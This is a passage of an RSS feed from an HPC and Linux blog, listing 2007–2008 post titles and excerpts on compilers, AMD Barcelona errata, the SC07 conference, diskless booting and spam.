      <description>This is too funny. This is the way it should be done &amp;hellip; cudos to Biorad (and maybe I can figure out a way to get these guys to use some JackRabbits &amp;hellip; not for amplification, but for storing the data &amp;hellip;) </description>
    </item>
    
    <item>
      <title>DragonFly update: humming along ...</title>
      <link>https://blog.scalability.org/2008/01/dragonfly-update-humming-along/</link>
      <pubDate>Sun, 13 Jan 2008 18:55:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/dragonfly-update-humming-along/</guid>
      <description>Haven&amp;rsquo;t updated this in a while. Done lots of code/function clean up. Still have more to do, but to get it to a usable beta state is very much closer than it was a month ago. Lots of items are working &amp;hellip; in a cool web 2.0 ajaxy sorta kinda way. And if we did it right, it gracefully degrades to average everyday HTML in the event that you want to shun javascript (sometimes a good idea in and of itself).</description>
    </item>
    
    <item>
      <title>Why use Linux?</title>
      <link>https://blog.scalability.org/2008/01/why-use-linux/</link>
      <pubDate>Sat, 12 Jan 2008 17:41:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/why-use-linux/</guid>
      <description>There are many reasons. Some economic and TCO, some performance, some development, some stability. Well, that last one is interesting. We hear occasionally about systems stability, ability to withstand withering loads, ability to function and multifunction with ease. The machine that this blog has been running on, shared with multiple other websites, and other functions, is running Linux. Patches relevant for its functionality have been applied with none of the &amp;ldquo;you must reboot now&amp;rdquo; garbage that other OSes impose.</description>
    </item>
    
    <item>
      <title>Update on file formats</title>
      <link>https://blog.scalability.org/2008/01/update-on-file-formats/</link>
      <pubDate>Thu, 10 Jan 2008 08:42:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/update-on-file-formats/</guid>
      <description>Robin Harris noted that he might have misinterpreted what happened. There is a blog which explains it here. Yes, Robin is correct, Microsoft does inspire strong reactions. Allow me to be blunt about it and say not all of them are deserved. The HPC people I have met and spoken with are good people. I don&amp;rsquo;t agree about some of their directions, but the vision is cool, and it looks correct.</description>
    </item>
    
    <item>
      <title>Interesting thoughts on CS education</title>
      <link>https://blog.scalability.org/2008/01/interesting-thoughts-on-cs-education/</link>
      <pubDate>Tue, 08 Jan 2008 22:14:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/interesting-thoughts-on-cs-education/</guid>
      <description>We haven&amp;rsquo;t covered CS education as such in this blog, as rather surprisingly, most of high performance computing is not being done/driven by CS people. This is probably unfortunate for several reasons, most of which is that many HPC practitioners are taking localized utilitarian views of HPC, and not looking at bigger pictures which may net them additional benefit. That said, the authors of this article imply that the state of CS education is in decline, that CS departments are not creating the computer scientists we need, rather they are creating java programmers, and others well insulated from a deeper understanding of the machine.</description>
    </item>
    
    <item>
      <title>Crystals ... diamond structure, and something called K_4</title>
      <link>https://blog.scalability.org/2008/01/crystals-diamond-structure-and-something-called-k_4/</link>
      <pubDate>Mon, 07 Jan 2008 15:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/crystals-diamond-structure-and-something-called-k_4/</guid>
      <description>I am going to have to look up the article referred to by /. This morning, they linked to an article in AMS about crystal symmetry, and a structure they called K_4. This structure, they claimed, does not occur in nature. Odd I thought &amp;hellip; as the picture they showed, well, I thought I had seen it before.
So using Inventor, I pulled out an old copy of a Gallium Arsenide lattice I used for simulations, more than a decade ago (aren&amp;rsquo;t open formats nice?</description>
    </item>
    
    <item>
      <title>Fortran version of the compiler quality test</title>
      <link>https://blog.scalability.org/2008/01/fortran-version-of-the-compiler-quality-test/</link>
      <pubDate>Sun, 06 Jan 2008 08:40:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/fortran-version-of-the-compiler-quality-test/</guid>
      <description>Quite a few people asked offline for a fortran version of the tests I indicated in the last post on this subject. So here is the basic code and its performance. What is interesting is that, for the same inputs as the C code, with no heroic loop unrolling/unwinding, the Fortran is about 3x faster than the C. Well, except for ifort. But we will get into that more later on.</description>
    </item>
    
    <item>
      <title>MPI-HMMer site is now live</title>
      <link>https://blog.scalability.org/2008/01/mpi-hmmer-site-is-now-live/</link>
      <pubDate>Sat, 05 Jan 2008 23:31:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/mpi-hmmer-site-is-now-live/</guid>
      <description>MPI-HMMer, the implementation of Professor Eddy&amp;rsquo;s HMMer code built for MPI clusters, is now live on the net. www.mpihmmer.org will get you there, as will mpihmmer.org. There are some nice nuggets buried within &amp;hellip; the papers, and a short discussion of MPI-HMMer-boost, which is a multi-layer parallel-accelerated implementation of HMMer. As usual, we are in search of meaningful and big benchmark tests to see what we can do (and if we can break it).</description>
    </item>
    
    <item>
      <title>On the retention of electronic data</title>
      <link>https://blog.scalability.org/2008/01/on-the-retention-of-electronic-data/</link>
      <pubDate>Fri, 04 Jan 2008 17:55:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/on-the-retention-of-electronic-data/</guid>
      <description>One of the things I and many other people worry about is how to retain data for long periods of time. This means that the data has to be accessible, readable, and convertable. This suggests that only open formats and file systems should ever be considered for data storage and retention. With this in mind, I read Robin Harris&#39; Storagemojo column this morning. Yeah, I would say he nailed it.</description>
    </item>
    
    <item>
      <title>HPCWire has lots of good reading for early 2008</title>
      <link>https://blog.scalability.org/2008/01/hpcwire-has-lots-of-good-reading-for-early-2008/</link>
      <pubDate>Fri, 04 Jan 2008 16:17:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/hpcwire-has-lots-of-good-reading-for-early-2008/</guid>
      <description>I don&amp;rsquo;t have time right now to comment in depth, but read John West&amp;rsquo;s predictions, as well as most of the other editorials. Spot on in most cases. Mirrors things we have been saying and working on for a while. They are at http://hpcwire.com</description>
    </item>
    
    <item>
      <title>Bandwidth as the limiting factor for HPC and IT</title>
      <link>https://blog.scalability.org/2008/01/bandwidth-as-the-limiting-factor-for-hpc-and-it/</link>
      <pubDate>Fri, 04 Jan 2008 07:22:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/bandwidth-as-the-limiting-factor-for-hpc-and-it/</guid>
      <description>I postulated for a while that this was the case. HPC technologies tend to evolve to a point of bandwidth (or latency) limitation. The broader IT market tends to follow.
This is basically stating that as you build out resources, common designs will tend to oversubscribe critical information pathways. I had a conversation with a potential partner today where we were talking about HPC across multiple different subfields and we kept coming back to this.</description>
    </item>
    
    <item>
      <title>12 hours into the new year, and I have 210 spam in my spam-box</title>
      <link>https://blog.scalability.org/2008/01/12-hours-into-the-new-year-and-i-have-210-spam-in-my-spam-box/</link>
      <pubDate>Tue, 01 Jan 2008 17:12:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/12-hours-into-the-new-year-and-i-have-210-spam-in-my-spam-box/</guid>
      <description>This would be about 12.8k spam estimated for this month. Last month I had 10.9k. I heard somewhere that someone said spam is decreasing. My measurements (graphs over the last year) show quite the opposite. Our spam-box is on a per user basis. Each mail runs an annotation filter gauntlet. At the end of this gauntlet, it is classified as spam or not-spam. Not all mail reaches the gauntlet. Most of the &amp;ldquo;mail&amp;rdquo; gets rejected.</description>
    </item>
    
    <item>
      <title>Compiler quality</title>
      <link>https://blog.scalability.org/2007/12/compiler-quality/</link>
      <pubDate>Mon, 31 Dec 2007 17:52:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/compiler-quality/</guid>
      <description>One of the comments to the previous post got me thinking about testing code on the same machine under various compilers. It is fairly well known that the Intel compilers emit code that doesn&amp;rsquo;t select reasonable operational paths on AMD processors, which usually results in identical binaries having vast performance difference on very similar platforms. This doesn&amp;rsquo;t make a great deal of sense from a technological point of view &amp;hellip; you want to test for SSE* support, and not use processor strings to set set paths, specifically in that paths which may be disabled by processor string on your own CPUs, which is enabled/fixed in an upgrade of the microcode would be deselected &amp;hellip; That is, such efforts are self defeating in the end.</description>
    </item>
    
    <item>
      <title>Quick note to people who register and don&#39;t get emails ...</title>
      <link>https://blog.scalability.org/2007/12/quick-note-to-people-who-register-and-dont-get-emails/</link>
      <pubDate>Sat, 22 Dec 2007 21:56:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/quick-note-to-people-who-register-and-dont-get-emails/</guid>
      <description>Sorry about that, but it looks like some email domains are still using DULs that contain business DSL and business cable modem. If you are having trouble getting the emails, please use either a gmail.com, or similar (saner) email system. They generally do not have problems getting email to them. And they don&amp;rsquo;t use RBLs/DULs. Go figure.
You may have seen me complain in the past about RBLs and their evil twin, DULs before.</description>
    </item>
    
    <item>
      <title>Why does IE do things the way IE does?</title>
      <link>https://blog.scalability.org/2007/12/why-does-ie-do-things-the-way-ie-does/</link>
      <pubDate>Thu, 20 Dec 2007 03:27:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/why-does-ie-do-things-the-way-ie-does/</guid>
      <description>I keep running into small (brick) walls with IE (mis)features. The latest one was when IE likes to send the whole file name &amp;hellip; including path and drive &amp;hellip; as the file upload name. The previous one was when IE refused to do the AJAXified file upload progress meter. Works on all the other browsers on all the platforms I have tried. Just not IE.
I seem to remember something like this from some years ago with DragonFly&amp;rsquo;s predecessor.</description>
    </item>
    
    <item>
      <title>There are days ...</title>
      <link>https://blog.scalability.org/2007/12/there-are-days/</link>
      <pubDate>Thu, 20 Dec 2007 03:19:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/there-are-days/</guid>
      <description>like this &amp;hellip;
&amp;hellip; Been hacking away at DragonFly. More soon.</description>
    </item>
    
    <item>
      <title>What he said ...</title>
      <link>https://blog.scalability.org/2007/12/what-he-said/</link>
      <pubDate>Mon, 17 Dec 2007 17:16:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/what-he-said/</guid>
      <description>John West has a good article on a phenomenon in HPC. Generally speaking there is a disconnect between chip vendors and final customers. This disconnect often means that high performance computing solutions vendor (like my day job) often have to deal with &amp;hellip; well &amp;hellip; interesting and exciting problems, in supply, quality, and so on.
John talks about this with respect to chip vendors, but his analysis also applies to motherboard vendors, ram makers, disk vendors, and so on.</description>
    </item>
    
    <item>
      <title>The joy of hardware ... when things don&#39;t respond as they should ...</title>
      <link>https://blog.scalability.org/2007/12/the-joy-of-hardware-when-things-dont-respond-as-they-should/</link>
      <pubDate>Sun, 16 Dec 2007 18:39:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/the-joy-of-hardware-when-things-dont-respond-as-they-should/</guid>
      <description>IPMI is (sometimes) a wonderful thing. It can help you figure out problems, provide a console over network capability, as well as power cycle machines. This is of course, when it works.
When it doesn&amp;rsquo;t, it is a nightmare. We have a cluster in place with a mostly functional IPMI stack. Customer indicated a problem with a node, and we brought it back to the lab. Turns out that during a recent move of theirs, they damaged a port on it.</description>
    </item>
    
    <item>
      <title>New article up</title>
      <link>https://blog.scalability.org/2007/12/new-article-up/</link>
      <pubDate>Thu, 13 Dec 2007 16:03:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/new-article-up/</guid>
      <description>Over at Linux Magazine, they have a multi-core cookbook. This is a site dedicated to pragmatic HPC topics &amp;hellip; more than just HPC, as everyone has to deal with multi-core these days. The question is how to program them. I wrote an article (well first of three, two written and submitted, third one I am still working on) on how to use OpenMP. This is pragmatic in that it show you how to go from a bare linux machine to openMP enabled in a short period of time.</description>
    </item>
    
    <item>
      <title>Paying too much for graphics ... companies ...</title>
      <link>https://blog.scalability.org/2007/12/paying-too-much-for-graphics-companies/</link>
      <pubDate>Thu, 13 Dec 2007 05:23:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/paying-too-much-for-graphics-companies/</guid>
      <description>That bastion of accurate reporting, Valleywag, has a short note on AMD taking a charge for the ATI acquiisition. Quite a few of us questioned the wisdom of the move at the time. nVidia would have made more sense, but given the market caps, it would have been nVidia acquiring AMD, and that isn&amp;rsquo;t likely to have happened. Well, as John at InsideHPC reported earlier in the week, AMD was not exactly rolling in the good news over the past two weeks.</description>
    </item>
    
    <item>
      <title>As the market (rapidly) grows</title>
      <link>https://blog.scalability.org/2007/12/as-the-market-rapidly-grows/</link>
      <pubDate>Fri, 07 Dec 2007 15:14:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/as-the-market-rapidly-grows/</guid>
      <description>We have been pointing out for a long while that the HPC market is growing at a break-neck pace. The latest IDC numbers, continue to support these claims. Many places have the numbers and the analysis. Pointing toHPCwire&amp;rsquo;s analysis: 
Yeah, that about sums it up. Now remember, that Linux is the most common and largest fraction of the HPC server market, and despite protestations (and marketing) to the contrary from interested parties, this shows no signs of letting up, or changing in any significant way.</description>
    </item>
    
    <item>
      <title>Lots of others have noticed as well ... [Updated]</title>
      <link>https://blog.scalability.org/2007/12/lots-of-others-have-noticed-as-well/</link>
      <pubDate>Fri, 07 Dec 2007 13:56:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/lots-of-others-have-noticed-as-well/</guid>
      <description>It is becoming clearer and clearer that we aren&amp;rsquo;t the only ones calling on AMD to do something about the Barcelona issue. AMD has too much invested in the system to be acting the way it is, damaging its relationship the way it is. Some of the others are simply suggesting a fessing up to the situation, as it appears that spokes people are trying to spin something hard. [**update: **the register has a take] No.</description>
    </item>
    
    <item>
      <title>Free advice to AMD on Barcelona</title>
      <link>https://blog.scalability.org/2007/12/free-advice-to-amd-on-barcelona/</link>
      <pubDate>Thu, 06 Dec 2007 16:19:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/free-advice-to-amd-on-barcelona/</guid>
      <description>First off, it is worth noting that the handling of the problem is causing far more damage to AMD than the problem would &amp;hellip; investment types call it loss of goodwill. This is the indication of something like a rudderless ship in motion. It needs to be corrected forthwith. Like yesterday. AMD needs to
 * Make the patch available on its website * Hire some contractors to make patches for RHEL/SuSE/Ubuntu, as well as source code installable packages which will build against the kernel * Lose the warranty hole.</description>
    </item>
    
    <item>
      <title>Non-competes</title>
      <link>https://blog.scalability.org/2007/12/non-competes/</link>
      <pubDate>Thu, 06 Dec 2007 16:02:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/non-competes/</guid>
      <description>From /., I saw an article on non-competes. It made the claim that they are the DRM of human capital. DRM is, for all intents and purposes, digital rights management, which is post sales control over assets. Human capital is a euphemism of course, for people &amp;hellip; knowledge workers specifically (which is itself a euphemism &amp;hellip; ) What struck me (as a Michigander of about 2 decades now) was this snippet:</description>
    </item>
    
    <item>
      <title>I understand the AMD Barcelona issues now</title>
      <link>https://blog.scalability.org/2007/12/i-understand-the-amd-barcelona-issues-now/</link>
      <pubDate>Thu, 06 Dec 2007 04:07:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/i-understand-the-amd-barcelona-issues-now/</guid>
      <description>I spoke with the AMD folks during SC and afterwords. Someone leaked the info yesterday, and today on the x86_64 discussion group, the errata and patches were detailed. I have had the patches for a few days now, and have a bios update I need to apply to a motherboard. That said, what this is, is a particular TLB-cache interaction, that under a very specific set of circumstances, will trigger a machine check exception, and hang a machine.</description>
    </item>
    
    <item>
      <title>Not up yet, but ... two articles coming soon to a site near you</title>
      <link>https://blog.scalability.org/2007/12/not-up-yet-but-two-articles-coming-soon-to-a-site-near-you/</link>
      <pubDate>Thu, 06 Dec 2007 03:49:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/not-up-yet-but-two-articles-coming-soon-to-a-site-near-you/</guid>
      <description>Check out Doug Eadline&amp;rsquo;s MultiCore Cookbook at Linux Magazine. Kudos to LM for continuing efforts to promote all manner of relevant articles. Sadly, some web publications may call this &amp;ldquo;zealotry&amp;rdquo; or similar, but as Linux continues to dominate HPC, and HPC does in fact continue to grow at a blistering pace, it appears that LM is one of the very small number of publications of record focusing upon HPC for end users.</description>
    </item>
    
    <item>
      <title>AMD vs Intel benchmarks for latest chips</title>
      <link>https://blog.scalability.org/2007/11/amd-vs-intel-benchmarks-for-latest-chips/</link>
      <pubDate>Thu, 29 Nov 2007 05:58:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/amd-vs-intel-benchmarks-for-latest-chips/</guid>
      <description>John at InsideHPC has a pointer to an article on benchmarks of the chips. There is no doubt that Intel is doing a good job on coming out with chips in a timely manner, something AMD is not doing well. Regardless of my criticism, what is interesting are the real world tests. I don&amp;rsquo;t care so much about winrar and other things that, generally speaking, won&amp;rsquo;t impact my or my customers lives all that much.</description>
    </item>
    
    <item>
      <title>Science ... with an attitude !</title>
      <link>https://blog.scalability.org/2007/11/science-with-an-attitude/</link>
      <pubDate>Wed, 28 Nov 2007 22:47:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/science-with-an-attitude/</guid>
      <description>Doing some gear shifting, I found a link to xkcd. On it, I found this drawing &amp;hellip;
[ ](http://xkcd.com/54/)
[channeling Austin Powers] Yeah baby!</description>
    </item>
    
    <item>
      <title>As the market evolves ...</title>
      <link>https://blog.scalability.org/2007/11/as-the-market-evolves/</link>
      <pubDate>Wed, 28 Nov 2007 15:32:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/as-the-market-evolves/</guid>
      <description>I have been a strong proponent of accelerators for quite some time. Unfortunately, as indicated, it has been sadly, lacking success in trying to convince VCs and others to help fund the development we saw was needed. &amp;ldquo;The market will be there&amp;rdquo;, we said. &amp;ldquo;When&amp;rdquo; they asked. &amp;ldquo;Soon&amp;rdquo; we replied. That wasn&amp;rsquo;t good enough for them. That was ~2 years ago. Now, free from much of the hype (though marketeers still inject a little every now and then), we see a rapidly developing accelerator marketplace.</description>
    </item>
    
    <item>
      <title>Why am I surprised that people found this surprising?</title>
      <link>https://blog.scalability.org/2007/11/why-am-i-surprised-that-people-found-this-surprising/</link>
      <pubDate>Wed, 28 Nov 2007 14:08:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/why-am-i-surprised-that-people-found-this-surprising/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Data center growth numbers</title>
      <link>https://blog.scalability.org/2007/11/data-center-growth-numbers/</link>
      <pubDate>Wed, 28 Nov 2007 13:35:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/data-center-growth-numbers/</guid>
      <description>From an article in Computerworld.. They note some results reported at a Gartner data center conference recently. Before I go into this, please remember that I am still laughing over the Itanium2 installed base debacle that Gartner had &amp;ldquo;predicted&amp;rdquo; in the previous decade (and early part of this decade). So, as with all projections, take theirs with a few kg of salt. What is most interesting is that they give current numbers.</description>
    </item>
    
    <item>
      <title>Expecting better of them</title>
      <link>https://blog.scalability.org/2007/11/expecting-better-of-them/</link>
      <pubDate>Fri, 23 Nov 2007 19:17:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/expecting-better-of-them/</guid>
      <description>On thanksgiving in the US, there is much to reflect upon. Introspection: what you are doing right, and what you are not, is always good. We do quite a bit of it. Though on Thanksgiving, it is interspersed between the mashed potatoes, turkey, and other elements. HPCwire appeared to do some introspection. Sort of. Their language and adoption of one side of a debate is, well, troubling.
They cherry picked from John Power&amp;rsquo;s blog.</description>
    </item>
    
    <item>
      <title>Losing our giants:  Gene Golub</title>
      <link>https://blog.scalability.org/2007/11/losing-our-giants-gene-golub/</link>
      <pubDate>Wed, 21 Nov 2007 04:54:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/losing-our-giants-gene-golub/</guid>
      <description>I never met Gene Golub; I have his and Charles Van Loan&amp;rsquo;s &amp;ldquo;Matrix Computations&amp;rdquo; book. It is one of those that you pour over, sometimes scratching your head as to how a particular algorithm works, and there is a detailed discussion of how to implement the algorithm, including very helpful discussions of the inner workings.
The book is extraordinary, you can almost hear the lecture proceeding as you read it. It is accessible, and largely comprehensible.</description>
    </item>
    
    <item>
      <title>SGI heads for turbulence again?</title>
      <link>https://blog.scalability.org/2007/11/sgi-heads-for-turbulence-again/</link>
      <pubDate>Sat, 17 Nov 2007 04:40:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sgi-heads-for-turbulence-again/</guid>
      <description>Sadly I missed John West and the InsideHPC folks at Reno. This was my fault, it was my intention to drop by and say hi. I read InsideHPC and a few others frequently. Turns out, not frequently enough, as he noted something from the San Jose Mercury News on SGI. Its &amp;ldquo;old&amp;rdquo; news now (more than 24 hours), but an SGI shareholder is pushing for a sale to a competitor. The rationale for this is to reduce the SG&amp;amp;A; costs.</description>
    </item>
    
    <item>
      <title>SC07: short wrap up</title>
      <link>https://blog.scalability.org/2007/11/sc07-short-wrap-up/</link>
      <pubDate>Fri, 16 Nov 2007 19:33:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-short-wrap-up/</guid>
      <description>Next year in Austin &amp;hellip; looking forward to it.
This year was muted relative to previous years. Some high fliers of the past were absent: I didn&amp;rsquo;t see Apple, I suspect they have decided that margins on iPhone and iTunes is simply better for them than getting in pitched battles for clusters. They haven&amp;rsquo;t had much in the way of success/installed base there. Linux Networx wasn&amp;rsquo;t there in a meaningful way (some people may have been in the whisper suites).</description>
    </item>
    
    <item>
      <title>SC07: day 2 recap</title>
      <link>https://blog.scalability.org/2007/11/sc07-day-2-recap/</link>
      <pubDate>Thu, 15 Nov 2007 15:04:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-day-2-recap/</guid>
      <description>Well, for day 2 had very little in the way of looking at demos. It was a day of meetings. That and a BOF. Ok, I did get to see the D-Wave systems stuff and ask some questions. It is not precisely what I thought it was. In short, they map problems onto an Ising model, and then cool the chip. The mapping onto the Ising model may be understood in terms of constraints on the &amp;ldquo;spin&amp;rdquo; state of the model.</description>
    </item>
    
    <item>
      <title>SC07: the nightlife</title>
      <link>https://blog.scalability.org/2007/11/sc07-the-nightlife/</link>
      <pubDate>Wed, 14 Nov 2007 06:57:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-the-nightlife/</guid>
      <description>So I had two events to attend, overlapping of course (of course). Beobash and a dinner with Microsoft. John and I got to Beobash and I spoke with Chris Samuel of VPAC and some associates from Australia. Doug Eadline interviewed me (and I didn&amp;rsquo;t have the slightest clue as to what I was going to say, so it came out rather funny sounding, sorry Doug). I spoke with lots of good people.</description>
    </item>
    
    <item>
      <title>SC07: what I saw so far</title>
      <link>https://blog.scalability.org/2007/11/sc07-what-i-saw-so-far/</link>
      <pubDate>Wed, 14 Nov 2007 06:44:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-what-i-saw-so-far/</guid>
      <description>Lots of stuff. Some of it pretty nice. Still lots of &amp;ldquo;me-too&amp;rdquo; products. The usual suspects are there. Evergrid is neat. Yeah, there I said it. It is neat. Vipin suggested I look at it and I did. Did I mention it is neat?
Lots of RAID cards/storage companies all showing off 5+ GB/s to hundreds of disks. Live on the floor. Running IOmeter (hmmmm). Mellanox showed off some nice new 10GbE cards.</description>
    </item>
    
    <item>
      <title>SC07: Coolest demo I saw today</title>
      <link>https://blog.scalability.org/2007/11/sc07-coolest-demo-i-saw-today/</link>
      <pubDate>Wed, 14 Nov 2007 06:33:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-coolest-demo-i-saw-today/</guid>
      <description>Go to the PSC (Pittsburgh Supercomputer Center) booth. Look at the Wii-steered molecular dynamics. Do some bowling with bucky balls using the Wii. In 1990, I wanted a VR system, and a data glove to position my atoms for my MD simulations. Vi is not a great user interface to configuration.
In 2007 the folks at PSC did a bang up job (great job) showing what could be done. This isn&amp;rsquo;t just a cute demo, it has real potential, for people studying specific reaction pathways, or needing to explore CVD, or protein misfolding (their alanine example shows guided folding), or &amp;hellip; Provide enough computing power, and you create an enabling technology.</description>
    </item>
    
    <item>
      <title>SC07: Planes and automobiles ... no trains ...</title>
      <link>https://blog.scalability.org/2007/11/sc07-planes-and-automobiles-no-trains/</link>
      <pubDate>Wed, 14 Nov 2007 06:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-planes-and-automobiles-no-trains/</guid>
      <description>We had an adventure going from Detroit to Reno. In LA, our outbound flight was canceled. Engine problems from what we understand. So we were booked at a hotel, and got to enjoy a relaxing 4 hour sleep. Thank gosh for Starbucks (Starboooooks). Triple shot mocha &amp;hellip; enough calories and caffeine to stave off a crash &amp;hellip; for a while, though I am gonna be paying for it later on. But, we are here.</description>
    </item>
    
    <item>
      <title>Dear web creators everywhere ...</title>
      <link>https://blog.scalability.org/2007/11/dear-web-creators-everywhere/</link>
      <pubDate>Sat, 10 Nov 2007 20:21:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/dear-web-creators-everywhere/</guid>
      <description>&amp;hellip; I know you think that pushing sound out to a browser is a good idea. I know you think the technology is cool. It is annoying. Absolutely, positively, completely annoying. I do not want to be listening to something I want to listen to, only to be interrupted by something intruding, un-invited, onto my audio system. It is worse than popups, whichi I block as they are annoying. I never gave you permission to use my resources in this manner.</description>
    </item>
    
    <item>
      <title>at SC07 next week</title>
      <link>https://blog.scalability.org/2007/11/at-sc07-next-week/</link>
      <pubDate>Fri, 09 Nov 2007 03:49:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/at-sc07-next-week/</guid>
      <description>Won&amp;rsquo;t live-blog, but I will try to snap pictures, get some video, and other things. Will report on neat new things. Maybe some neat old things. Hopefully will see many old friends, and make some new ones. Much to do, much to do &amp;hellip;</description>
    </item>
    
    <item>
      <title>DragonFly update</title>
      <link>https://blog.scalability.org/2007/11/dragonfly-update/</link>
      <pubDate>Wed, 07 Nov 2007 07:22:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/dragonfly-update/</guid>
      <description>Here are a few screenshots. Too tired to make thumbnails.
 Login  * Projects  Add Project  Jobs  Project Users  Wizard  Apps   The web system is fully db centric now. Finishing up the utilities. Hopefully they will be done before SC07. The Mercurial repository is up if you want to see what we are up to (and look at our latest commits).</description>
    </item>
    
    <item>
      <title>When Perl modules go bad</title>
      <link>https://blog.scalability.org/2007/11/when-perl-modules-go-bad/</link>
      <pubDate>Fri, 02 Nov 2007 00:18:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/when-perl-modules-go-bad/</guid>
      <description>There is a name for my pain and it is WWW::Mechanize. This module is a complex little bit which allows Perl code to programmatically load and interact with web sites. Of course it doesn&amp;rsquo;t have a built in JavaScript engine or anything else like that, but it is supposed to be used for unit testing. That is, provided it works. Which, on many machines and systems I have tried, it simply does not.</description>
    </item>
    
    <item>
      <title>Diskless SuSE, success at last</title>
      <link>https://blog.scalability.org/2007/10/diskless-suse-success-at-last/</link>
      <pubDate>Thu, 01 Nov 2007 03:37:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/diskless-suse-success-at-last/</guid>
      <description>SuSE has been resisting me running it diskless. Actively resisting. The end result was that I had to build a custom kernel (we are using/supporting 2.6.22.6 right now), making sure to build nfs, and networking in, and not as modules. What I learned was that even if you think you have built everything, you could leave important little things off. And Murphy&amp;rsquo;s law dictates that those left off things are important.</description>
    </item>
    
    <item>
      <title>Source of amusement for a monday evening</title>
      <link>https://blog.scalability.org/2007/10/source-of-amusement-for-a-monday-evening/</link>
      <pubDate>Mon, 29 Oct 2007 22:45:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/source-of-amusement-for-a-monday-evening/</guid>
      <description>Update 24-Dev-2007: One of the site owner listed below contacted me and asked me to remove their personal information which was contained in the site registration. I complied. I have not checked whether or not their system is still an attack host. It is very important that people with good intentions protect their systems before placing them on the net. It is generally very hard to do this for windows, and fairly easy to do this for linux.</description>
    </item>
    
    <item>
      <title>reading an interesting book, and an interesting site</title>
      <link>https://blog.scalability.org/2007/10/reading-an-interesting-book-and-an-interesting-site/</link>
      <pubDate>Mon, 29 Oct 2007 06:17:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/reading-an-interesting-book-and-an-interesting-site/</guid>
      <description>&amp;ldquo;The education of an accidental CEO&amp;rdquo;. Very interesting read. It turns out a number of the folks whom have written about their experience running companies, all talk about the &amp;ldquo;gut feeling&amp;rdquo; about things. People, partners, etc.
I had some &amp;ldquo;gut feelings&amp;rdquo; about some stuff I won&amp;rsquo;t get into, and I found myself not following them. This was a mistake. Past times when I did &amp;ldquo;follow my gut&amp;rdquo; I wasn&amp;rsquo;t lead astray.</description>
    </item>
    
    <item>
      <title>teaching an old distribution new booting tricks</title>
      <link>https://blog.scalability.org/2007/10/teaching-an-old-distribution-new-booting-tricks/</link>
      <pubDate>Mon, 29 Oct 2007 06:09:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/teaching-an-old-distribution-new-booting-tricks/</guid>
      <description>So I am trying to get SuSE to PXE boot into a diskless session. In order to do this, first I have to get it to install into a directory. Next we have to do something about the kernel.
The first part is sort of, kind of, solved. Took a while, but it is working. Second is more complex. SuSE doesn&amp;rsquo;t make it easy to remaster the kernel. Nor does RH (or Fedora, &amp;hellip;).</description>
    </item>
    
    <item>
      <title>When bad people/bots attack</title>
      <link>https://blog.scalability.org/2007/10/when-bad-peoplebots-attack/</link>
      <pubDate>Fri, 26 Oct 2007 16:26:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/when-bad-peoplebots-attack/</guid>
      <description>In some of our logs, we come across some of the more interesting things people try to jam into our forms. The examples below have some, well, interesting aspects to them.
